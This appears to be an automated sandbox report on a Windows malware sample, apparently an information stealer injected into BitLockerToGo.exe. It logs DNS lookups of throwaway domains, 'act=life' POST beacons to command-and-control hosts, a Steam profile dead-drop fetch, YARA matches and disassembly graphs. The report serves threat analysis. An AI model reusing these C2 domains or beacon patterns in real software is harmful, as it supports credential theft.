                                                                                                                                                                Oct 2, 2024 14:55:29.461071014 CEST1.1.1.1192.168.2.80x129dName error (3)offensivedzvju.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 14:55:29.547616959 CEST1.1.1.1192.168.2.80xf474Name error (3)vozmeatillu.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 14:55:29.560189009 CEST1.1.1.1192.168.2.80x92a6Name error (3)drawzhotdog.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 14:55:29.572525978 CEST1.1.1.1192.168.2.80x542bName error (3)fragnantbui.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 14:55:29.582690001 CEST1.1.1.1192.168.2.80x45d4Name error (3)stogeneratmns.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 14:55:29.593302965 CEST1.1.1.1192.168.2.80xfb48Name error (3)reinforcenh.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 14:55:29.602756023 CEST1.1.1.1192.168.2.80x3e2bNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 14:55:30.930160999 CEST1.1.1.1192.168.2.80x3f47No error (0)gravvitywio.store172.67.209.193A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 14:55:30.930160999 CEST1.1.1.1192.168.2.80x3f47No error (0)gravvitywio.store104.21.16.12A (IP address)IN (0x0001)false

                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                • dividenntykw.shop
                                                                                                                                                                • steamcommunity.com
                                                                                                                                                                • gravvitywio.store

                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                0192.168.2.849716172.67.188.2104436736C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-10-02 12:55:28 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Host: dividenntykw.shop
                                                                                                                                                                2024-10-02 12:55:28 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                2024-10-02 12:55:29 UTC772INHTTP/1.1 200 OK
                                                                                                                                                                Date: Wed, 02 Oct 2024 12:55:29 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: PHPSESSID=93qie3uvbdrq89379gj5k2j0as; expires=Sun, 26 Jan 2025 06:42:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RBlE5AhvJtISe6SJJxOde8pcHsnDtT1s2f2IB8UxyQO5jmm6wss39orC2HLCk%2BtTdK3usNSBR25TaG4oPdmWNFi05tWsj6enHwqZtY1Lqmrs61QbHVO9drYaANfmmoZrZf41%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8cc4d8d5c8ac0ce9-EWR
                                                                                                                                                                2024-10-02 12:55:29 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                Data Ascii: aerror #D12
                                                                                                                                                                2024-10-02 12:55:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                1192.168.2.849717104.102.49.2544436736C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-10-02 12:55:30 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                Host: steamcommunity.com
                                                                                                                                                                2024-10-02 12:55:30 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Date: Wed, 02 Oct 2024 12:55:30 GMT
                                                                                                                                                                Content-Length: 34837
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: sessionid=1e3031f20caafb608e56075f; Path=/; Secure; SameSite=None
                                                                                                                                                                Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                2024-10-02 12:55:30 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                2024-10-02 12:55:30 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                                                                                                                Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                                                                                                                2024-10-02 12:55:30 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
                                                                                                                                                                2024-10-02 12:55:30 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                2192.168.2.849718172.67.209.1934436736C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-10-02 12:55:31 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Host: gravvitywio.store
                                                                                                                                                                2024-10-02 12:55:31 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                2024-10-02 12:55:32 UTC772INHTTP/1.1 200 OK
                                                                                                                                                                Date: Wed, 02 Oct 2024 12:55:32 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: PHPSESSID=35hfla59mok3pdr1n92oaupp8n; expires=Sun, 26 Jan 2025 06:42:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kBnVjYvP3mvFDnIHNDjfq1W46s5kghtuPjYbh9fz01n6cie%2BnrJHCdzzEQJ5SPiHnZ9UZGlBiatN5WWmBVfkgnQu%2F5Wdcwnyot9MEvu4P2NGz1lDF5OL1NhQiUL1U0VPmXF3lw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8cc4d8e83fd28c60-EWR
                                                                                                                                                                2024-10-02 12:55:32 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                Data Ascii: aerror #D12
                                                                                                                                                                2024-10-02 12:55:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Statistics

                                                                                                                                                                CPU Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Memory Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                Behavior

                                                                                                                                                                Click to jump to process

                                                                                                                                                                System Behavior

                                                                                                                                                                General

                                                                                                                                                                Target ID:0
                                                                                                                                                                Start time:08:54:44
                                                                                                                                                                Start date:02/10/2024
                                                                                                                                                                Path:C:\Users\user\Desktop\BW4pTs1x3V.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Users\user\Desktop\BW4pTs1x3V.exe"
                                                                                                                                                                Imagebase:0x7ff67ce60000
                                                                                                                                                                File size:13'565'176 bytes
                                                                                                                                                                MD5 hash:3677EBC159E92251F19020E9AB4B62AD
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1885915924.000000C000506000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000000.00000002.1887668238.00007FF67D7C0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000000.00000000.1452154530.00007FF67D7C0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:3
                                                                                                                                                                Start time:08:55:26
                                                                                                                                                                Start date:02/10/2024
                                                                                                                                                                Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                Imagebase:0xc90000
                                                                                                                                                                File size:231'736 bytes
                                                                                                                                                                MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate
                                                                                                                                                                Has exited:true

                                                                                                                                                                Disassembly

                                                                                                                                                                Reset < >

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:1.1%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                  Signature Coverage:41.3%
                                                                                                                                                                  Total number of Nodes:63
                                                                                                                                                                  Total number of Limit Nodes:9
                                                                                                                                                                  execution_graph 21322 2d15eb1 21323 2d15ebb 21322->21323 21324 2d1601e 21322->21324 21323->21324 21328 2d15ad0 LdrInitializeThunk 21323->21328 21325 2d162f4 21324->21325 21327 2d15ad0 LdrInitializeThunk 21324->21327 21327->21324 21328->21324 21329 2d19220 21331 2d19240 21329->21331 21330 2d1937e 21331->21330 21333 2d15ad0 LdrInitializeThunk 21331->21333 21333->21330 21334 2d16322 21336 2d15d70 21334->21336 21335 2d163f3 21336->21335 21339 2d15ad0 LdrInitializeThunk 21336->21339 21338 2d15ea6 21339->21338 21340 2d15eeb 21341 2d15f27 21340->21341 21342 2d15f92 21341->21342 21347 2d15ad0 LdrInitializeThunk 21341->21347 21346 2d15ad0 LdrInitializeThunk 21342->21346 21345 2d16185 21346->21345 21347->21342 21348 2cdffe0 21351 2ce0240 21348->21351 21349 2ce0641 21351->21349 21352 2d15520 21351->21352 21353 2d155c5 21352->21353 21354 2d1553b 21352->21354 21355 2d155ac 21352->21355 21356 2d155cb 21352->21356 21361 2d155b2 21352->21361 21363 2d15549 21352->21363 21367 2d126b0 21353->21367 21354->21353 21354->21356 21354->21361 21354->21363 21364 2d12630 21355->21364 21360 2d126b0 RtlFreeHeap 21356->21360 21359 2d15596 RtlReAllocateHeap 21359->21361 21362 2d155d4 21360->21362 21361->21351 21363->21359 21365 2d12686 RtlAllocateHeap 21364->21365 21366 2d1265b 21364->21366 21366->21365 21368 2d12729 21367->21368 21370 2d126c6 21367->21370 21368->21356 21369 2d12716 RtlFreeHeap 21369->21368 21370->21369 21371 2cdcf00 21372 2cdcf09 21371->21372 21373 2cdd0ee ExitProcess 21372->21373 21374 2cdcf11 GetInputState 21372->21374 21375 2cdcf1e 21374->21375 21376 2cdcf26 GetCurrentThreadId GetCurrentProcessId 21375->21376 21377 2cdd0e4 21375->21377 21378 2cdcf58 21376->21378 21377->21373 21382 2cdea30 21378->21382 21384 2cdea6b 21382->21384 21383 2cdeb3c LoadLibraryExW 21387 2cdeb54 21383->21387 21384->21383 21385 2cdd0db 21385->21377 21392 2ce1c50 CoInitialize 21385->21392 21387->21385 21390 2cdef98 21387->21390 21393 2cdf950 21387->21393 21388 2cdf352 21389 2d126b0 RtlFreeHeap 21388->21389 21389->21385 21390->21385 21390->21388 21397 2cdf3c0 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap 21390->21397 21395 2cdfa00 21393->21395 21394 2cdfa25 21394->21390 21395->21394 21396 2d15520 3 API calls 21395->21396 21396->21395 21397->21390

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 02CDFFE0 Relevance: 21.6, Strings: 17, Instructions: 378COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 0 2cdffe0-2ce023e 1 2ce026d-2ce0291 0->1 2 2ce0240-2ce026b call 2ce1570 0->2 6 2ce02ff-2ce032d 1->6 7 2ce05ad-2ce05c1 1->7 8 2ce037b-2ce037f 1->8 9 2ce0298-2ce02a1 1->9 10 2ce0458-2ce045c 1->10 11 2ce0384-2ce03a8 1->11 12 2ce0484-2ce04f7 1->12 13 2ce0461-2ce047d 1->13 2->1 14 2ce032f 6->14 15 2ce035b-2ce0374 6->15 34 2ce05c8-2ce05d1 7->34 28 2ce06ae-2ce06b5 8->28 9->6 16 2ce06a7 10->16 31 2ce03aa 11->31 32 2ce03db-2ce040b 11->32 29 2ce052b-2ce0533 12->29 30 2ce04f9 12->30 13->7 13->12 17 2ce068e-2ce0695 13->17 18 2ce0689 13->18 19 2ce0626-2ce063a call 2d15520 13->19 20 2ce0682 13->20 21 2ce06a0 13->21 22 2ce0680 13->22 23 2ce0641-2ce0666 13->23 24 2ce069c 13->24 25 2ce05d8-2ce05ec 13->25 26 2ce05f3-2ce0605 13->26 27 2ce0670 13->27 33 2ce0330-2ce0359 call 2ce15d0 14->33 15->7 15->8 15->10 15->11 15->12 15->13 15->17 15->18 15->19 15->20 15->21 15->22 15->23 15->24 15->25 15->26 15->27 16->28 17->21 17->24 18->17 19->17 19->18 19->20 19->21 19->22 19->23 19->24 19->27 20->18 21->16 39 2ce0675-2ce067b 23->39 24->21 25->17 25->18 25->19 25->20 25->21 25->22 25->23 25->24 25->26 25->27 50 2ce060c-2ce061f 26->50 27->39 46 2ce06bf-2ce06cd 28->46 41 2ce0535-2ce053f 29->41 42 2ce0552-2ce0562 29->42 40 2ce0500-2ce0529 call 2ce1760 30->40 35 2ce03b0-2ce03d9 call 2ce16f0 31->35 36 2ce040d-2ce040f 32->36 37 2ce0436-2ce0445 32->37 33->15 34->17 34->18 34->19 34->20 34->21 34->22 34->23 34->24 34->25 34->26 34->27 35->32 51 2ce0410-2ce0434 call 2ce1650 36->51 60 2ce0448-2ce0451 37->60 39->22 40->29 55 2ce0540-2ce0550 41->55 43 2ce0586-2ce05a6 42->43 44 2ce0564-2ce0566 42->44 43->7 56 2ce0570-2ce0582 44->56 46->6 46->7 46->8 46->10 46->11 46->12 46->13 46->17 46->18 46->19 46->20 46->21 46->22 46->23 46->24 46->25 46->26 46->27 50->17 50->18 50->19 50->20 50->21 50->22 50->23 50->24 50->27 51->37 55->42 55->55 56->56 62 2ce0584 56->62 60->7 60->10 60->12 60->13 60->17 60->18 60->19 60->20 60->21 60->22 60->23 60->24 60->25 60->26 60->27 62->43
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 'U!W$*]^_$0A"C$6Y)[$?Q'S$DM$G1\3$G5@7$M#N]$SU$T'W!$TW$X9R;$Y-]/$\_$w=v?$IK
                                                                                                                                                                  • API String ID: 0-1031535001
                                                                                                                                                                  • Opcode ID: 739ba02ca6fbb15f1de5592ee61e238cfa73bd0585d7b84c3a26309e22eeb9d0
                                                                                                                                                                  • Instruction ID: d75a51552504485b9a4ccb28dcb79d409079e5b3c927a21ada27449f9ffe4391
                                                                                                                                                                  • Opcode Fuzzy Hash: 739ba02ca6fbb15f1de5592ee61e238cfa73bd0585d7b84c3a26309e22eeb9d0
                                                                                                                                                                  • Instruction Fuzzy Hash: B2F170B050C380ABD7609F21E880B6FBBE5FF86744F509C1CE98A9B241DB748855CF96
                                                                                                                                                                  Function 02CDCF00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 160threadCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentProcess$ExitInputStateThread
                                                                                                                                                                  • String ID: G'&!
                                                                                                                                                                  • API String ID: 1029096631-2503113863
                                                                                                                                                                  • Opcode ID: a18b6dd8ee09b44e6278d5313e9cca66c68506b5489c2062df2fc61e7cd55d4e
                                                                                                                                                                  • Instruction ID: 47fa65b03a58f81c93531bb0e255f8046d1a0261d438e341b7af815d1f238904
                                                                                                                                                                  • Opcode Fuzzy Hash: a18b6dd8ee09b44e6278d5313e9cca66c68506b5489c2062df2fc61e7cd55d4e
                                                                                                                                                                  • Instruction Fuzzy Hash: A841257180C280ABD301BF68D584A1EFBE6EF96705F548D0CE6C587262C336D821DBA7
                                                                                                                                                                  Function 02CDF950 Relevance: 5.4, Strings: 4, Instructions: 423COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 107 2cdf950-2cdf9f8 108 2cdfa00-2cdfa09 107->108 108->108 109 2cdfa0b-2cdfa1e 108->109 111 2cdfd4d-2cdfd51 109->111 112 2cdfa2c-2cdfc6b 109->112 113 2cdfcbf-2cdfd46 call 2cdc6f0 109->113 114 2cdfa25-2cdfa27 109->114 115 2cdfcb6-2cdfcba 109->115 116 2cdfd56-2cdfd69 109->116 118 2cdfe88 111->118 126 2cdfc6d-2cdfc6f 112->126 127 2cdfc98-2cdfca3 112->127 113->111 113->116 120 2cdff4c-2cdff76 113->120 121 2cdfebc-2cdfed6 113->121 122 2cdff04-2cdff1e 113->122 123 2cdfeb1-2cdfeba 113->123 124 2cdfd70 113->124 125 2cdfe10-2cdfe2f 113->125 119 2cdfe80-2cdfe87 114->119 128 2cdfe91-2cdfe97 115->128 116->120 116->121 116->122 116->123 116->124 116->125 118->128 135 2cdff78 120->135 136 2cdffaa-2cdffc4 120->136 121->122 129 2cdfed8 121->129 131 2cdff44 122->131 132 2cdff20-2cdff42 call 2ce1bd0 122->132 123->118 137 2cdfd76-2cdfd9f 124->137 125->123 134 2cdfea0-2cdfea2 125->134 125->137 149 2cdfdcf-2cdfde3 call 2d15520 125->149 150 2cdfdea-2cdfdf1 125->150 151 2cdfeaa-2cdfeaf 125->151 152 2cdfda6 125->152 153 2cdfe01-2cdfe0e 125->153 154 2cdfe5c-2cdfe66 125->154 155 2cdfdf8 125->155 156 2cdfe36-2cdfe4a 125->156 157 2cdfe51-2cdfe53 125->157 158 2cdfe70 125->158 133 2cdfc70-2cdfc96 call 2ce1ad0 126->133 144 2cdfca6-2cdfcaf 127->144 128->134 139 2cdfee0-2cdff02 call 2ce1bd0 129->139 131->120 132->131 133->127 134->151 143 2cdff80-2cdffa8 call 2ce1b50 135->143 136->123 136->125 137->123 137->134 137->151 137->152 137->154 137->155 137->158 139->122 143->136 144->111 144->113 144->115 144->116 144->120 144->121 144->122 144->123 144->124 144->125 149->123 149->134 149->137 149->150 149->151 149->152 149->154 149->155 149->158 150->123 150->134 150->151 150->152 150->154 150->155 150->158 151->119 162 2cdfda8-2cdfdab 152->162 153->162 154->158 155->153 156->123 156->134 156->137 156->149 156->150 156->151 156->152 156->153 156->154 156->155 156->157 156->158 157->154 168 2cdfe77 158->168 170 2cdfdb4-2cdfdc8 162->170 168->119 170->123 170->134 170->137 170->149 170->150 170->151 170->152 170->154 170->155 170->158
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: ,c'}$6{6u$@3R${7@1
                                                                                                                                                                  • API String ID: 0-581628498
                                                                                                                                                                  • Opcode ID: 4d1847d5fb10d30c15587fc5077681038c322498ab6aa18164c2b54b1fcaac3a
                                                                                                                                                                  • Instruction ID: 418f93d84e5a37305fb6efed1249bce58ee28e8686d415298a94eef9d3d883a2
                                                                                                                                                                  • Opcode Fuzzy Hash: 4d1847d5fb10d30c15587fc5077681038c322498ab6aa18164c2b54b1fcaac3a
                                                                                                                                                                  • Instruction Fuzzy Hash: A1021DB1600B009FD3308F26D894B56BBF5FB4A315F008E5CE9AA8BB90D775A815CF90
                                                                                                                                                                  Function 02D15EB1 Relevance: 2.8, Strings: 2, Instructions: 282COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
